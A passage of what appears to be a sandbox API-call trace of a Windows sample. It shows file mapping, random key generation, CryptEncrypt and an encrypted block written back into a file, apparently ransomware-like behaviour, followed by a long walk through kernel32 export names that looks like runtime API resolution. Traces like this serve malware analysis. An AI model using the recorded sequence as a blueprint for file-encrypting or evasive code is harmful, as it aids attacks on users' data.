returned 0x420 [0071.157] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3f2e5e0 | out: lpFileSize=0x3f2e5e0*=65536) returned 1 [0071.157] CreateFileMappingW (hFile=0x420, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x424 [0071.157] MapViewOfFile (hFileMappingObject=0x424, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0071.158] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0071.158] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0071.161] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0071.163] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e548*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e548*=0x100) returned 1 [0071.166] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0071.168] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.168] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0071.169] CloseHandle (hObject=0x424) returned 1 [0071.169] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.169] WriteFile (in: hFile=0x420, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e568, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e568*=0x108, lpOverlapped=0x0) returned 1 [0071.170] CloseHandle (hObject=0x0) returned 0 [0071.170] CloseHandle (hObject=0x420) returned 1 [0071.171] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.171] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.171] GetTickCount () returned 0x114a583 [0071.171] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.175] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0071.175] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0071.175] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0071.175] lstrlenA (lpString="kernel32.dll") returned 12 [0071.176] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0071.176] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0071.176] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0071.176] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0071.176] lstrlenA (lpString="ADDATOMA") returned 8 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0071.176] lstrlenA (lpString="ADDATOMW") returned 8 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0071.176] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0071.176] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0071.176] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0071.176] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0071.176] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0071.176] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0071.176] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0071.176] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0071.176] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0071.176] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0071.176] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0071.176] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0071.176] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0071.177] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0071.177] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0071.177] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0071.177] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0071.177] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0071.177] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0071.177] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0071.177] lstrlenA (lpString="BACKUPREAD") returned 10 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0071.177] lstrlenA (lpString="BACKUPSEEK") returned 10 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0071.177] lstrlenA (lpString="BACKUPWRITE") returned 11 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0071.177] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0071.177] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0071.177] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0071.177] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0071.177] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0071.177] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0071.177] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0071.177] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0071.177] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0071.178] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0071.178] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0071.178] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0071.178] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0071.178] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0071.178] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0071.178] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0071.178] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0071.178] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0071.178] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0071.178] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0071.178] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0071.178] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0071.178] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0071.178] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0071.178] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0071.178] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0071.178] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0071.178] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0071.179] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0071.179] lstrlenA (lpString="BEEP") returned 4 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0071.179] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0071.179] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0071.179] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0071.179] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0071.179] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0071.179] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0071.179] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0071.179] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0071.179] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0071.179] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0071.179] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0071.179] lstrlenA (lpString="CANCELIO") returned 8 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0071.179] lstrlenA (lpString="CANCELIOEX") returned 10 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0071.179] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0071.179] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0071.179] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0071.180] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0071.180] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0071.180] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0071.180] lstrlenA (lpString="CHECKELEVATION") returned 14 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0071.180] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0071.180] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0071.180] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0071.180] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0071.180] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0071.180] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0071.180] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0071.180] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0071.180] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0071.180] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0071.180] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0071.180] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0071.180] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0071.180] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0071.180] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0071.180] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0071.181] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0071.181] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0071.181] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0071.181] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0071.181] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0071.181] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0071.181] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0071.181] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0071.181] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0071.181] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0071.181] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0071.181] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0071.181] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0071.181] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0071.181] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0071.181] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0071.181] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0071.181] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0071.181] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0071.182] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0071.182] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0071.182] lstrcpyA (in: lpString1=0x3f2d960, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") 